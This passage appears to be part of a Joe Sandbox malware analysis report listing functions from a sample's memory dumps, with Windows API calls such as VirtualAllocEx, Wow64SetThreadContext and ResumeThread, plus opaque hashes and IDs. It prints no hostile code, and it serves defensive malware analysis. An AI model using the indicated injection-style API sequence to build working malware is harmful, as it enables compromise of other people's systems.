                                                                        • Instruction Fuzzy Hash: EB21E3B5D00258DFDB10CF9AD984ADEBBF4FB48320F14845AE919A7350C374A940CF65
                                                                        Function 07850FD8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07851058
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1716489529.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7850000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID: {s#
                                                                        • API String ID: 1726664587-3582909824
                                                                        • Opcode ID: dfb08859a38e1b475b519b40b6940e06b5ea826afdc634ffcdbe9aadd9424ba6
                                                                        • Instruction ID: 3c61e35ac029b47fb39ab86cef2e99ac015cc62e58195f4ed52a90dbb9c5519d
                                                                        • Opcode Fuzzy Hash: dfb08859a38e1b475b519b40b6940e06b5ea826afdc634ffcdbe9aadd9424ba6
                                                                        • Instruction Fuzzy Hash: 37212AB1D002599FDB10CF9AC844ADEBBF5FF48320F508429E519A7240C7759540CB60
                                                                        Function 07850D50 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07850DCE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1716489529.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7850000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID: {s#
                                                                        • API String ID: 983334009-3582909824
                                                                        • Opcode ID: 2ae7665f8138e814c6ef2570dbac9a400e8af51180f1ded20caa071317d897eb
                                                                        • Instruction ID: 79720b1466d0291124cee9ffd6d52c8d7481beb1851c975bf359e45fbe76e7c0
                                                                        • Opcode Fuzzy Hash: 2ae7665f8138e814c6ef2570dbac9a400e8af51180f1ded20caa071317d897eb
                                                                        • Instruction Fuzzy Hash: 89215EB1D003098FDB10CFAAC4857EEBBF4EF98324F14842AD419A7240C778A945CFA0
                                                                        Function 0150D650 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0150D6D7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1713637295.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1500000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID: {s#
                                                                        • API String ID: 3793708945-3582909824
                                                                        • Opcode ID: e6a54745d1957f81d27280926fb4281d7665dcedca9363a70c08bcd899c66230
                                                                        • Instruction ID: 4aad819d282c174cc7d35384f619b39184ba9df21f0fc3295bdb38a3ca71ed82
                                                                        • Opcode Fuzzy Hash: e6a54745d1957f81d27280926fb4281d7665dcedca9363a70c08bcd899c66230
                                                                        • Instruction Fuzzy Hash: 7521B3B59002589FDB10CF9AD984ADEBBF8FB48320F14845AE918A7350D375A944CF65
                                                                        Function 07850E20 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07850E96
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1716489529.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7850000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: {s#
                                                                        • API String ID: 4275171209-3582909824
                                                                        • Opcode ID: 8d54e2280dc21148e958ddc6691d7afaecaa74a33be47a6fafa059a22923347c
                                                                        • Instruction ID: 00d24f829301c741f5d89e6074ab6640927768964ab43e332e6f1950e27eaf9c
                                                                        • Opcode Fuzzy Hash: 8d54e2280dc21148e958ddc6691d7afaecaa74a33be47a6fafa059a22923347c
                                                                        • Instruction Fuzzy Hash: B21159728002499FDB10DFAAC844ADFFFF5EF58320F24881AE915A7250CB759940CFA0
                                                                        Function 07850C98 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1716489529.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7850000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID: {s#
                                                                        • API String ID: 947044025-3582909824
                                                                        • Opcode ID: 43c2efa57bec884e8b9a970a1899e8fb44cf3438e065148ce1945c419066eff0
                                                                        • Instruction ID: 64b8174ae63a8f590b474c8ad83e6d5bf872e505e4ec9c890641a4b52e65f1d5
                                                                        • Opcode Fuzzy Hash: 43c2efa57bec884e8b9a970a1899e8fb44cf3438e065148ce1945c419066eff0
                                                                        • Instruction Fuzzy Hash: 3F115BB59002498FDB10DFAAD4457EEFBF4EF98320F24841AD419A7240CB75A544CFA5
                                                                        Function 07850E28 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07850E96
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1716489529.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7850000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: {s#
                                                                        • API String ID: 4275171209-3582909824
                                                                        • Opcode ID: ff64cd6290acb89c23c6b40778ae5e0c4b2cc469533a5c6f0fa698a41ade7c05
                                                                        • Instruction ID: 7280a209fb82e2d3adf272001c777f9deaecb5172515af712c6b6f5e6e8d227f
                                                                        • Opcode Fuzzy Hash: ff64cd6290acb89c23c6b40778ae5e0c4b2cc469533a5c6f0fa698a41ade7c05
                                                                        • Instruction Fuzzy Hash: 771149719002499FDF10DFAAC844ADFBFF5EF88320F248819E519A7250C7759940CFA0
                                                                        Function 07855568 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PostMessageW.USER32(?,?,?,?), ref: 078555CD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1716489529.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7850000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost
                                                                        • String ID: {s#
                                                                        • API String ID: 410705778-3582909824
                                                                        • Opcode ID: 577986f3bbf6c21eecb365bcf9db9ade5aedd3ec16df7258a936fda45d92162d
                                                                        • Instruction ID: 056b0bb8813a77a967d3a23bf222b31f3f8e265c95bcf2596bc0a23f743590da
                                                                        • Opcode Fuzzy Hash: 577986f3bbf6c21eecb365bcf9db9ade5aedd3ec16df7258a936fda45d92162d
                                                                        • Instruction Fuzzy Hash: AE11E3B58002499FDB10DF9AD885BDEBFF8EB58320F10885AE914A7201D375A544CFA1
                                                                        Function 07850CA0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1716489529.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7850000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID: {s#
                                                                        • API String ID: 947044025-3582909824
                                                                        • Opcode ID: 7741add91e9ac0e73cc0a3f1d20dbcba817645ac3b034fb4eac7caac12dbfeb5
                                                                        • Instruction ID: 16a9b9e494f0acd8bcf8b34b077fcf842d71d4fc5f661b6e1a9597fc9a5ef87f
                                                                        • Opcode Fuzzy Hash: 7741add91e9ac0e73cc0a3f1d20dbcba817645ac3b034fb4eac7caac12dbfeb5
                                                                        • Instruction Fuzzy Hash: DE114CB1D002498FDB10DFAAC4457EEFBF8EF98324F248419D519A7240CB75A944CFA4
                                                                        Function 0150AF58 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0150AFBE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1713637295.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1500000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID: {s#
                                                                        • API String ID: 4139908857-3582909824
                                                                        • Opcode ID: 834b3da9a4ab801d9f9a7c7b3d492cea9f01ee6606b3ee27e2fbfbdc283d479f
                                                                        • Instruction ID: b7f6ed130105b1ec98f34ff48639726448f2e41fcbf11d1951ee67fab3cd68ec
                                                                        • Opcode Fuzzy Hash: 834b3da9a4ab801d9f9a7c7b3d492cea9f01ee6606b3ee27e2fbfbdc283d479f
                                                                        • Instruction Fuzzy Hash: 8F110FB5C007898FDB10CF9AD444ADEFBF4EB88224F14845AD429A7640C379A545CFA1
                                                                        Function 07855570 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PostMessageW.USER32(?,?,?,?), ref: 078555CD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1716489529.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7850000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost
                                                                        • String ID: {s#
                                                                        • API String ID: 410705778-3582909824
                                                                        • Opcode ID: 75450ebdfdae604248f13bbe7cd46aee3db9de441097943f0d8b11f73e50686f
                                                                        • Instruction ID: d6f984991f87fb85a5c6a9b5b5db2572fa7fd565b87e59d59605fc7edb5e013b
                                                                        • Opcode Fuzzy Hash: 75450ebdfdae604248f13bbe7cd46aee3db9de441097943f0d8b11f73e50686f
                                                                        • Instruction Fuzzy Hash: B411D3B5800349DFDB10DF9AD885BDEBBF8EB48320F14845AE919A7200C375A544CFA1
                                                                        Function 091F4FDF Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @
                                                                        • API String ID: 0-2766056989
                                                                        • Opcode ID: 4fe50518148f8d7474245dd3d540259a0a6ea99eaf674558550495eab642a3a0
                                                                        • Instruction ID: ac6a3c109cc44f1adb0b7461cfe898957dd9b44c14acd9319adeedc24389e91f
                                                                        • Opcode Fuzzy Hash: 4fe50518148f8d7474245dd3d540259a0a6ea99eaf674558550495eab642a3a0
                                                                        • Instruction Fuzzy Hash: 21E1C378E04218DFDB50DFA8C890AADBBF2FB49314F1481AAE919E7345D731A985CF50
                                                                        Function 091F3D9E Relevance: 1.5, Strings: 1, Instructions: 231COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LRtq
                                                                        • API String ID: 0-4092542751
                                                                        • Opcode ID: 2f6dec781fda3607ab3941bc89455fabaccdf609a9b2fbe568b230f41af1fce3
                                                                        • Instruction ID: dcac7eb1d03b9b115f6c8cced498898c9e2b24851e146dcfb80778d9af421a05
                                                                        • Opcode Fuzzy Hash: 2f6dec781fda3607ab3941bc89455fabaccdf609a9b2fbe568b230f41af1fce3
                                                                        • Instruction Fuzzy Hash: 43910774E042189FCB14DFA9C890AADBBF2EF89354F20856AE929E7345D7359942CF40
                                                                        Function 091F4894 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Tetq
                                                                        • API String ID: 0-1197912954
                                                                        • Opcode ID: 8849b16559b4e079659ea1c7386a1db6e1417897632b76598fd6d687d7bed70e
                                                                        • Instruction ID: 4f5f121b493da7a639d494e8b24256852ab65ebda35ab34f0ca51fe8a158083c
                                                                        • Opcode Fuzzy Hash: 8849b16559b4e079659ea1c7386a1db6e1417897632b76598fd6d687d7bed70e
                                                                        • Instruction Fuzzy Hash: 2D51AD71B002198FCB01DBB9D85497EBBF7EFC83247148A29E41ADB395EB309C068791
                                                                        Function 091F4428 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8xq
                                                                        • API String ID: 0-3139237302
                                                                        • Opcode ID: e67e5d1717b153f3c32dae6c1ba5a9d584a2f95179b610818081ed28737d9591
                                                                        • Instruction ID: 751793d8d019216d0c7aee8a3d0f0f4a0bcc58cd2d213c63e20d7d32aab35def
                                                                        • Opcode Fuzzy Hash: e67e5d1717b153f3c32dae6c1ba5a9d584a2f95179b610818081ed28737d9591
                                                                        • Instruction Fuzzy Hash: 3E41D874E0011DAFCF04EFA8D5949AEBBB2FB89304F108429E915A73A4DB359D46CF50
                                                                        Function 091F592C Relevance: 1.4, Strings: 1, Instructions: 101COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: {s#
                                                                        • API String ID: 0-3582909824
                                                                        • Opcode ID: a9aeafdba7cf9d654e50a0e29f6ec6dfbe017a0adf6ed3d6f87a30eb8602c024
                                                                        • Instruction ID: 48f12bb69687ec88e20e2babace4a4cc2343c284434e528e7d19cccba8ccac16
                                                                        • Opcode Fuzzy Hash: a9aeafdba7cf9d654e50a0e29f6ec6dfbe017a0adf6ed3d6f87a30eb8602c024
                                                                        • Instruction Fuzzy Hash: FD316AB2A002489FCF14DFA9D845A9EBFF9EF48324F14846AE509E7250D7359904CFA0
                                                                        Function 091F4417 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8xq
                                                                        • API String ID: 0-3139237302
                                                                        • Opcode ID: ba5ea6c2c4301ff3701550f62d256c96979fdfd3ad97f754a4e57dc7b81ecc93
                                                                        • Instruction ID: 1df27eefdc2fa70de22bc329835ccff242b6d3c82377c1e85be6e8bd5747e2f5
                                                                        • Opcode Fuzzy Hash: ba5ea6c2c4301ff3701550f62d256c96979fdfd3ad97f754a4e57dc7b81ecc93
                                                                        • Instruction Fuzzy Hash: C6411A74E001099FCF05DFA8D5545AEBBB2FB89304F10846AE915E73A4DB359946CF50
                                                                        Function 091F5748 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: {s#
                                                                        • API String ID: 0-3582909824
                                                                        • Opcode ID: 9e3ae17fbb1e475d760fe6d7e4168ee8b1466e53bede2409e68910780f3a7390
                                                                        • Instruction ID: 2e6a0ddb3d98b72d41c372e6d6cd3a8edc0b496278dbb2a056f753f1f310532d
                                                                        • Opcode Fuzzy Hash: 9e3ae17fbb1e475d760fe6d7e4168ee8b1466e53bede2409e68910780f3a7390
                                                                        • Instruction Fuzzy Hash: 4E31EEB0D1125CDFDB20CF9AC598B9EBFF5AB48318F24806AE508BB240C7B55845CBA5
                                                                        Function 091F5C94 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: {s#
                                                                        • API String ID: 0-3582909824
                                                                        • Opcode ID: c13ebefc2d00faae08064dbb6b667c8b6e7476fc36acf9e4d7af27da7d7dfd01
                                                                        • Instruction ID: 1cb61191cfb8da953f040722f3d28413c7e77c44812dc8c3c27dbd6fae894986
                                                                        • Opcode Fuzzy Hash: c13ebefc2d00faae08064dbb6b667c8b6e7476fc36acf9e4d7af27da7d7dfd01
                                                                        • Instruction Fuzzy Hash: FF311FB0D11258DFDB20CF99D988B9EBFF5BB48314F24842AE408BB650C7B55845CFA0
                                                                        Function 091F5608 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Tetq
                                                                        • API String ID: 0-1197912954
                                                                        • Opcode ID: d35ee227ad721fa3b15b316566ed3cb6f61c97c81711dfe15c9217ca4d8dd4e8
                                                                        • Instruction ID: 849539ba3e32f325c955fc1bf7a45d9f5cfed961a0950c7f2cde03ee5f0de7e6
                                                                        • Opcode Fuzzy Hash: d35ee227ad721fa3b15b316566ed3cb6f61c97c81711dfe15c9217ca4d8dd4e8
                                                                        • Instruction Fuzzy Hash: 92114FB5F0061E8BCF18EBB999106FFBBB2AB84310B504039D515E7340EB318E01CBA0
                                                                        Function 091F593C Relevance: 1.3, Strings: 1, Instructions: 56COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: {s#
                                                                        • API String ID: 0-3582909824
                                                                        • Opcode ID: c2e780a0e6350371087a723ddf637b35bedfe62d955f2e1be712c0ee05e034cd
                                                                        • Instruction ID: 5ebf0b8b89798b6e63e19400fdbe70a7e59ca00af0a7a56b37c83abfc3b1c7c6
                                                                        • Opcode Fuzzy Hash: c2e780a0e6350371087a723ddf637b35bedfe62d955f2e1be712c0ee05e034cd
                                                                        • Instruction Fuzzy Hash: 432100B69042499FCB20CF9AD884ADEBBF4FB48320F10845AE919A7210C375A954CFA5
                                                                        Function 091FACB0 Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Tetq
                                                                        • API String ID: 0-1197912954
                                                                        • Opcode ID: 51f17fcb6ebaab134883aa59e38324b11e928630760ac757657bda0afedc3cfc
                                                                        • Instruction ID: 94c4b365eb7d0ecb938785d20e7ed3278c1171c4c8df8a0f48683afb4e441f00
                                                                        • Opcode Fuzzy Hash: 51f17fcb6ebaab134883aa59e38324b11e928630760ac757657bda0afedc3cfc
                                                                        • Instruction Fuzzy Hash: 6611C6B4E146488BDB18CFEAC5546DEFBB6AF88300F14C02AD419AB358EB7419468F90
                                                                        Function 091FACA1 Relevance: 1.3, Strings: 1, Instructions: 51COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Tetq
                                                                        • API String ID: 0-1197912954
                                                                        • Opcode ID: c5e14d29f1930b2f5073f4594b8c783159c6583b8a4b4b3d076485c26bdb2ffa
                                                                        • Instruction ID: 5e2a6e19e3a26b8538890ac3db4ae17c9b0478cd92d568f1e366577742de8e9f
                                                                        • Opcode Fuzzy Hash: c5e14d29f1930b2f5073f4594b8c783159c6583b8a4b4b3d076485c26bdb2ffa
                                                                        • Instruction Fuzzy Hash: 8611B6B4E146488BDB18CFEAC5542EEFBF6AF88304F14C02AD519AB358EB7419468F50
                                                                        Function 091FAD80 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Tetq
                                                                        • API String ID: 0-1197912954
                                                                        • Opcode ID: 46b06edb9b5adc24f23fa3d5dbc3ff2c587cd33c61581d663947791d08f3cc23
                                                                        • Instruction ID: a58d7282134348ea9da373f74f865573b1c7e5ee6d4ce76d957421adf86d8184
                                                                        • Opcode Fuzzy Hash: 46b06edb9b5adc24f23fa3d5dbc3ff2c587cd33c61581d663947791d08f3cc23
                                                                        • Instruction Fuzzy Hash: DE116075E012199FCF05CFE8D8949ADFBB2FF89310F14816AE919AB265C7355906CF40
                                                                        Function 091FAE78 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Tetq
                                                                        • API String ID: 0-1197912954
                                                                        • Opcode ID: f3d28279215359e5870b400b62d9eea94c92f90f4eb20745776ad667422c652a
                                                                        • Instruction ID: a5c6b33ec9f8173e3bf93fae0084d961baa700f7dab846c9ae2f19ac469e0593
                                                                        • Opcode Fuzzy Hash: f3d28279215359e5870b400b62d9eea94c92f90f4eb20745776ad667422c652a
                                                                        • Instruction Fuzzy Hash: 37116C75E002199FCB08DFE8D8909ADFBB2FB88310F20812AE919AB365C7356905CF50
                                                                        Function 091F4038 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 7
                                                                        • API String ID: 0-1790921346
                                                                        • Opcode ID: e31b5d5ba037205ff0c12fab709c2e8fc6b28adaaa5cddde4abc1f8495572abb
                                                                        • Instruction ID: 7825288ee12db3ca8d5f27c3e2cf4a5e3bb593438baa4b7df6e752ed23aba861
                                                                        • Opcode Fuzzy Hash: e31b5d5ba037205ff0c12fab709c2e8fc6b28adaaa5cddde4abc1f8495572abb
                                                                        • Instruction Fuzzy Hash: EEE02B75E4510CEBCB14EFF4E4197FE7BB8AB40308F504595E506532A0D7700E46C641
                                                                        Function 091F3348 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 6
                                                                        • API String ID: 0-498629140
                                                                        • Opcode ID: fe1d0f893d3d42b50d9313828849b1d20b4e23f9aec4b61bdf9a85ca9220b507
                                                                        • Instruction ID: b9c7b1a35cdc47e39082df515dc32732755d3d1b4d5a11266820a4597e1f870a
                                                                        • Opcode Fuzzy Hash: fe1d0f893d3d42b50d9313828849b1d20b4e23f9aec4b61bdf9a85ca9220b507
                                                                        • Instruction Fuzzy Hash: 30E0C234F0820DEBCB14DFF4D41A2ADBFB8AB45349F104995E40593240EF724A4BDA41
                                                                        Function 091F7450 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: m
                                                                        • API String ID: 0-3775001192
                                                                        • Opcode ID: 7afc8c6f0f8cb58d1a95907b6d3a49c65dc01abc98c644526995ba6b1a5cb789
                                                                        • Instruction ID: fba5d5cfc812a8d73af3709d28e3452d48cc5462159ba8772eb5c3b313443e44
                                                                        • Opcode Fuzzy Hash: 7afc8c6f0f8cb58d1a95907b6d3a49c65dc01abc98c644526995ba6b1a5cb789
                                                                        • Instruction Fuzzy Hash: 98E0C234E0520CEBCB09EFB4D8153ADBFB89B00308F0045A4E50553280D7710A56CAA1
                                                                        Function 091FAEF0 Relevance: .3, Instructions: 262COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7a432d520d7899e6d07135dcaffd7235ffc97211472ceb23b176f6f4891b8c61
                                                                        • Instruction ID: 2ecfe0d4bed4b3a22eca4b49be8a4f96eae71dc4851ef434997910f2d1dcc4d3
